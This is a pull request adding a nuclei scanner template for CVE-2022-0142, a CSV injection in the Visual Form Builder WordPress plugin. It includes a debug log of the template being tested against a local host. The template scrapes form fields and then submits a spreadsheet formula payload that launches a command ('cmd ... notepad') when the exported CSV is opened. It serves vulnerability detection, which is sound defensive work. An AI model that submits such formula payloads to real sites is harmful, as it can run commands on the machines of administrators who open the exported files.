### PR TITLE
feat: add nuclei template for CVE-2022-0142 for Visual Form Builder

### DIFF
--- a/http/cves/2022/CVE-2022-0142.yaml
+++ b/http/cves/2022/CVE-2022-0142.yaml
@@ -1,0 +1,79 @@
+id: CVE-2022-0142
+
+info:
+  name: Visual Form Builder < 3.0.8 - CSV Injection
+  author: antigravity
+  severity: critical
+  description: |
+    Visual Form Builder WordPress plugin < 3.0.8 contains a CSV injection caused by insufficient sanitization, letting low-privilege or unauthenticated users inject commands into exported CSV files.
+  reference:
+    - https://wpscan.com/vulnerability/03210390-2054-40c0-9508-39d168087878
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0142
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-0142
+    cwe-id: CWE-1236
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: millermedia
+    product: visual-form-builder
+    framework: wordpress
+  tags: cve,cve2022,wordpress,wp-plugin,visual-form-builder,csv-injection,unauth
+
+variables:
+  payload: "=cmd|' /C notepad'!'A1'"
+  path: "/?page_id=5"
+
+http:
+  - raw:
+      - |
+        GET {{path}} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST {{path}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        form_id={{form_id}}&{{text_field}}={{payload}}&{{secret_field}}=12&_vfb-secret={{secret_field}}&vfb-spam=&vfb-submit=Submit&_wp_http_referer={{referer}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Your form was successfully submitted"
+
+    extractors:
+      - type: regex
+        name: form_id
+        part: body
+        group: 1
+        regex:
+          - 'name="form_id" value="(\d+)"'
+        internal: true
+
+      - type: regex
+        name: text_field
+        part: body
+        group: 1
+        regex:
+          - '(?s)vfb-item-text.*?name="(vfb-\d+)"'
+        internal: true
+
+      - type: regex
+        name: secret_field
+        part: body
+        group: 1
+        regex:
+          - 'name="_vfb-secret" value="(vfb-\d+)"'
+        internal: true
+
+      - type: regex
+        name: referer
+        part: body
+        group: 1
+        regex:
+          - 'name="_wp_http_referer" value="([^"]+)"'
+        internal: true


### PR DESCRIPTION
/claim #14192

### PR Information

- Added [CVE-2022-0142](https://github.com/advisories/GHSA-g4v7-hfrx-hqf3)
- References: https://wpscan.com/vulnerability/03210390-2054-40c0-9508-39d168087878

**Email sent to templates@projectdiscovery.io on how to recreate vulnerable environment**

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

`nuclei -debug` log fairly larger, truncated here but screenshot also included:

```
nuclei-templates % nuclei -t http/cves/2022/CVE-2022-0142.yaml -u http://localhost:8000 -var path="/?page_id=5" -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.5.1

		projectdiscovery.io

[INF] Current nuclei version: v3.5.1 (latest)
[INF] Current nuclei-templates version: v10.3.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2022-0142] Dumped HTTP request for http://localhost:8000/?page_id=5

GET /?page_id=5 HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2022-0142] Dumped HTTP response http://localhost:8000/?page_id=5



HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Wed, 03 Dec 2025 05:35:00 GMT
Server: Apache/2.4.65 (Debian)
X-Powered-By: PHP/8.3.28

... (HTML content) ...
<input type="hidden" name="form_id" value="2" />
...
<input type="text" name="vfb-11" ... />
...

[INF] [CVE-2022-0142] Dumped HTTP request for http://localhost:8000/?page_id=5

POST /?page_id=5 HTTP/1.1
Host: localhost:8000
User-Agent: Nuclei - Open-source Project (github.com/projectdiscovery/nuclei)
Connection: close
Content-Length: 153
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

form_id=2&vfb-11=%3Dcmd%7C%27+%2F/C+notepad%27%21%27A1%27&vfb-9=12&_vfb-secret=vfb-9&vfb-spam=&vfb-submit=Submit&_wp_http_referer=%2F%3Fpage_id%3D5

[DBG] [CVE-2022-0142] Dumped HTTP response http://localhost:8000/?page_id=5

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Wed, 03 Dec 2025 05:35:01 GMT
Server: Apache/2.4.65 (Debian)
X-Powered-By: PHP/8.3.28

...
<p id="form_success">Your form was successfully submitted. Thank you for contacting us.</p>
...

[CVE-2022-0142:word-1] [http] [critical] http://localhost:8000/?page_id=5

```

<img width="862" height="482" alt="Screenshot 2025-12-03 at 08 50 57" src="https://github.com/user-attachments/assets/e07cfdfc-d03b-47a6-b2cf-d23b3155225b" />

<img width="876" height="167" alt="Screenshot 2025-12-03 at 08 51 11" src="https://github.com/user-attachments/assets/2103466b-1cdc-4760-b4e0-3d200abe830e" />




<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
